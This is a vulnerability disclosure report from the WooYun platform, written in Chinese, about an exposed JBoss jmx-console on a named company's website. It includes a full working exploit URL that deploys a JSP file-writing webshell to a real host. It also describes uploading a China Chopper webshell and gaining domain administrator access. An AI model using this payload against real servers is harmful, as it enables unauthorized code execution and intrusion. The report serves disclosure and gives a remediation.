当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-088284

漏洞标题:某数字图书馆开发商官网可被getshell

相关厂商:北京中数创新技术有限公司

漏洞作者: Blunber

提交时间:2014-12-23 16:17

修复时间:2015-02-06 16:18

公开时间:2015-02-06 16:18

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-23: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-02-06: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

公司做的不小,安全也同时重视一下!

详细说明:

1、官网地址:

1中数创新界面.jpg


2、jboss 明晃晃的就眼前,而且没有设置任何权限限制。

2JBOSS界面.jpg


漏洞证明:

3、上传任意脚本

http://www.cdi.cn:4237/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=upload5warn.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25+if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b+%25%3e&argType=boolean&arg4=True


3上传任意文件.jpg


4、传个菜刀马,自制html。请参照“http://wooyun.org/bugs/wooyun-2014-085961”

4shell脚本.jpg


5、连接成功

5连接菜刀.jpg


6、测试一下权限,就知道是这样。

6管理员权限,域里机器界面.jpg


7、开放的端口

7开通的端口.jpg


8、可建用户,还有不少域

8可以建立用户,内网渗透时间问题.jpg


9、中数开发的系统

9中数涉及到的系统.jpg

修复方案:

给jmx-console加上访问密码,过滤请求等。账号我已经删除,礼物就算了!别跨省就行!

版权声明:转载请注明来源 Blunber@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝